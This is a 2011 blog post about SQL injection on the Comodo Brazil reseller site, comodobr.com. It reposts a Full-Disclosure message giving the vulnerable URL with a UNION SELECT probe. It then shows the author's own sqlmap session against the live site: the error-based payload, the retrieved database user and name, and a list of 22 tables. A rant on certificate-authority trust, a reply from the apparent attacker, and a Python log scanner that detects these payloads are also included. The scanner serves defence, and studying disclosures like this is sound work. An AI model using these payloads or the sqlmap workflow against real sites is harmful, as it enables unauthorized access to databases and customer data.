Nicolai

Comodogate v2

May 22nd, 2011
Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
Sun, 22 May 2011 11:20:54 PDT
X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <[email protected]>
X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
Subject: [Full-disclosure] comodobr.com sqli


vulnerable link:
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -

http://pastebin.com/9qwdL1pA


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


---------------------------------------------------------------------


PS C:\Python27> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35

>>> You're not going to find him... <<<
>>> Let's check the host: <<<>>><<<>>><

PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 21:00:00

Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prod
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---

[21:00:00] [INFO] retrieved: 5.0.91-community-log

web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'

[21:00:00] [INFO] retrieved: comodobr_site@localhost
current user: 'comodobr_site@localhost'

[21:00:00] [INFO] retrieved: comodobr_comodobr
current database: 'comodobr_comodobr'

current user is DBA: 'False'


[*] shutting down at: 21:00:00

PS C:\Python27>


>>> Looks real <<<>>><<<>>><<<>>><<<>>>
>>> Let's see the inside of the db: <<<


web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'
current user: 'comodobr_site@localhost'
current database: 'comodobr_comodobr'
current user is DBA: 'False'

[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_associa
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_categoria
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_importado
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_confirm_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_contab
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_expected_delivery_time
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_hosting_contas
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_meios_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status_codes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos_historico
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prod_grupos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prods
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_resellers
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_server_software
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_users
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_item
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
Database: comodobr_comodobr
[22 tables]
+-------------------------------+
| comodo_boleto                 |
| comodo_boleto_associa         |
| comodo_boleto_categoria       |
| comodo_boleto_importado       |
| comodo_boleto_status          |
| comodo_confirm_pago           |
| comodo_contab                 |
| comodo_expected_delivery_time |
| comodo_hosting_contas         |
| comodo_meios_pago             |
| comodo_pedido_status          |
| comodo_pedido_status_codes    |
| comodo_pedidos                |
| comodo_pedidos_historico      |
| comodo_prod_grupos            |
| comodo_prods                  |
| comodo_resellers              |
| comodo_server_software        |
| comodo_users                  |
| comodo_vw_crm_clientes        |
| comodo_webhostreport_item     |
| comodo_webhostreport_subitem  |
+-------------------------------+


[*] shutting down at: 21:00:00

PS C:\Python27>
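The two request shapes on this page, the UNION ALL SELECT probe from the list post and the error-based payload sqlmap reported against ?prod=, are what a web server log review should catch. The Python below is an added example, not part of the original paste or of any Comodo code; its log lines are constructed, and its CHAR() decoder turns the CHAR(58,...) calls into the ':nmm:' and ':rus:' delimiters that sqlmap wraps around the value it extracts from the database error.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not from the original paste): line 1 carries the list
# post's "UNION ALL SELECT ... -- -" probe, line 2 sqlmap's error-based payload, line 3 is normal.
SAMPLE_LOG = """\
199.48.147.35 - - [22/May/2011:11:20:54 -0700] "GET /comprar/compra_codesigning.php?prod=8%20UNION%20ALL%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14%20--%20- HTTP/1.1" 200 5120
199.48.147.35 - - [22/May/2011:21:00:00 -0700] "GET /comprar/compra_codesigning.php?prod=8%20AND%20(SELECT%201198%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT%20(CASE%20WHEN%20(1198=1198)%20THEN%201%20ELSE%200%20END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 812
203.0.113.7 - - [22/May/2011:11:21:10 -0700] "GET /comprar/compra_codesigning.php?prod=8 HTTP/1.1" 200 5120
"""

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')
CHAR_RE = re.compile(r"\bCHAR\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.I)
SIGNATURES = {
    "union-select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    # sqlmap's MySQL >= 5.0 error-based technique: duplicate-key error from FLOOR(RAND(0)*2) in a GROUP BY
    "dup-key-error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I),
    "information-schema": re.compile(r"\binformation_schema\b", re.I),
    "comment-tail": re.compile(r"--\s"),
}
INT_PARAMS = {"prod"}  # parameters the application should only ever accept as integers

def decode_char_calls(text):
    """Expand MySQL CHAR(58,110,109,109,58)-style calls into the string they build (':nmm:')."""
    return CHAR_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), text)

def scan(log_text):
    """Return one finding per query parameter that matches a signature or breaks its type."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = decode_char_calls(value)
            tags = [sig for sig, rx in SIGNATURES.items() if rx.search(decoded)]
            if name in INT_PARAMS and not value.isdigit():
                tags.append("non-integer-" + name)
            if tags:
                hits.append({"ip": m.group("ip"), "time": m.group("time"), "status": m.group("status"),
                             "path": url.path, "param": name, "tags": tags, "decoded": decoded})
    return hits

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["time"], h["status"], h["path"], h["param"], ", ".join(h["tags"]), "|", h["decoded"])
```

Running it prints one finding per flagged parameter; the harmless third request yields nothing, and the decoded value shows the tool's delimiters in clear.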


When is Comodo going to fix this? How come Comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CAs when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?

GET YOUR SHIT TOGETHER.


EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
I've just checked his claims, which were true. Everyone can claim that they hacked Comodo, or that the vulnerability was fixed, so all I have done is open sqlmap and test it :-)

Also here's a new response:


Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
Tue, 24 May 2011 14:58:39 PDT
X-Mailer: YahooMailWebService/0.8.111.303096
Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
Subject: [Full-disclosure] My comments on comodobr.com


I have to agree with Comodo president and CEO, Melih Abdulhayoglu.

In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
However, in the same way that the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten their own security. Further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.

Just my 50 cents

[Edit]
The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSRs and client info shouldn't be "readily available" like this.
No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.


http://pastebin.com/MFSUdCnk

_______________________________________________
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/


PS C:\Users\Nicolai> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8

Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35

PS C:\Users\Nicolai>